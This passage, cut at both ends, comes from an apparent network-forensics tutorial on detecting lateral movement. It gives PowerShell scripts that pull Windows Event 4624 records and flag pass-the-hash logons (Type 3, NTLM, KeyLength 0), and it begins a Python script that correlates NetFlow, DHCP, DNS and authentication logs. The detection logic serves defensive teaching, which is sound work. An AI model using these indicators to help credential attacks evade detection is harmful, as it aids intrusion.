style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } catch {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"Failed on $dc : $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Sort and display the movement chain</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$authEvents | Sort-Object Timestamp | Format-Table Timestamp, EventID, SourceIP, Workstation, ServiceName, LogonType, AuthPackage -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export for correlation with NetFlow and DNS data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$authEvents | Export-Csv \"auth_chain_${targetAccount}.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"53-detecting-pass-the-hash-vs-kerberos-vs-legitimate-auth\">5.3 Detecting Pass-the-Hash vs. Kerberos vs. Legitimate Auth<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#53-detecting-pass-the-hash-vs-kerberos-vs-legitimate-auth\" class=\"hash-link\" aria-label=\"Direct link to 5.3 Detecting Pass-the-Hash vs. Kerberos vs. Legitimate Auth\" title=\"Direct link to 5.3 Detecting Pass-the-Hash vs. Kerberos vs. Legitimate Auth\" translate=\"no\">​</a></h3>\n<p>The authentication package field in Event 4624 reveals the technique:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event 4624 field analysis for lateral movement technique identification:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=3 (Network) + AuthPackage=NTLM + Source workstation mismatch = Pass-the-Hash</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=3 (Network) + AuthPackage=Kerberos + Normal hours = Likely legitimate</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=3 (Network) + AuthPackage=Kerberos + Off hours + no prior logon type 2 on that host = Suspicious</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=9 (NewCredentials) + AuthPackage=NTLM = Explicit alternate credentials (runas /netonly or Invoke-Command with PSCredential)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LogonType=10 (RemoteInteractive) = RDP session</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Pass-the-Hash specific indicator in Event 4624:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  KeyLength: 0    ← This field being 0 in a Type 3 NTLM logon</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    indicates no session key negotiated = pass-the-hash</span><br></span></code></pre></div></div>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect pass-the-hash by finding Type 3 NTLM logons with KeyLength=0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># and where the workstation doesn't match the source IP DHCP assignment</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$pthIndicators = Get-WinEvent -ComputerName $dc -FilterHashtable @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LogName = 'Security'; Id = 4624; StartTime = $startTime; EndTime = $endTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $xml = [xml]$_.ToXml()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $data = $xml.Event.EventData.Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $logonType  = ($data | Where-Object Name -eq 'LogonType').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $authPkg    = ($data | Where-Object Name -eq 'AuthenticationPackageName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $keyLength  = ($data | Where-Object Name -eq 'KeyLength').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $sourceIP   = ($data | Where-Object Name -eq 'IpAddress').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $workstation = ($data | Where-Object Name -eq 'WorkstationName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $account    = ($data | Where-Object Name -eq 'TargetUserName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Pass-the-hash indicators:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Type 3 network logon + NTLM + KeyLength 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($logonType -eq '3' -and $authPkg -eq 'NTLM' -and $keyLength -eq '0') {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Timestamp   = $_.TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Account     = $account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            SourceIP    = $sourceIP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Workstation = $workstation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            KeyLength   = $keyLength</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Indicator   = 'POSSIBLE_PASS_THE_HASH'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Where-Object { $_ -ne $null }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$pthIndicators | Sort-Object Timestamp | Format-Table -AutoSize</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-6--cross-source-correlation-building-the-attack-timeline\">Part 6  Cross-Source Correlation: Building the Attack Timeline<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-6--cross-source-correlation-building-the-attack-timeline\" class=\"hash-link\" aria-label=\"Direct link to Part 6  Cross-Source Correlation: Building the Attack Timeline\" title=\"Direct link to Part 6  Cross-Source Correlation: Building the Attack Timeline\" translate=\"no\">​</a></h2>\n<p>This is where the forensic picture comes together. Each source tells a partial story. The JOIN across all four sources builds the complete lateral movement timeline.</p>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"61-the-correlation-script-joining-all-four-sources\">6.1 The Correlation Script: Joining All Four Sources<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#61-the-correlation-script-joining-all-four-sources\" class=\"hash-link\" aria-label=\"Direct link to 6.1 The Correlation Script: Joining All Four Sources\" title=\"Direct link to 6.1 The Correlation Script: Joining All Four Sources\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#!/usr/bin/env python3</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Cross-source correlation engine for network forensics.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Joins NetFlow, DHCP, DNS cache, and Windows auth logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">to reconstruct lateral movement timelines.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"display:inline-block;color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Input files:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - netflow.csv:   ts, src_ip, dst_ip, dst_port, bytes, flags</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - dhcp.csv:      timestamp, event_type, ip, hostname, mac</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - auth.csv:      timestamp, event_id, source_ip, account, logon_type, auth_pkg, key_length</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  - dns_cache.csv: source_host, resolved_hostname, resolved_ip, ttl</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"display:inline-block;color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Output:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">  Lateral movement events with full context enrichment.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> json</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> timedelta</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> collections </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> defaultdict</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">class</span><span class=\"token plain\"> </span><span class=\"token class-name\" style=\"color:hsl(26, 100%, 29%)\">NetworkForensicsCorrelator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">__init__</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\">      </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ip -&gt; [(start, end, hostname, mac)]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">auth_events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">      </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># list of auth log records</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">netflow_events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># list of flow records</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">dns_observations </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"> </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># source_host -&gt; [resolved_ips]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">load_dhcp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Load and build IP timeline from DHCP logs.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> row </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> csv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">DictReader</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">fromisoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> KeyError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Build timeline (simplified)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        active </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> defaultdict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ev </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            ip </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token 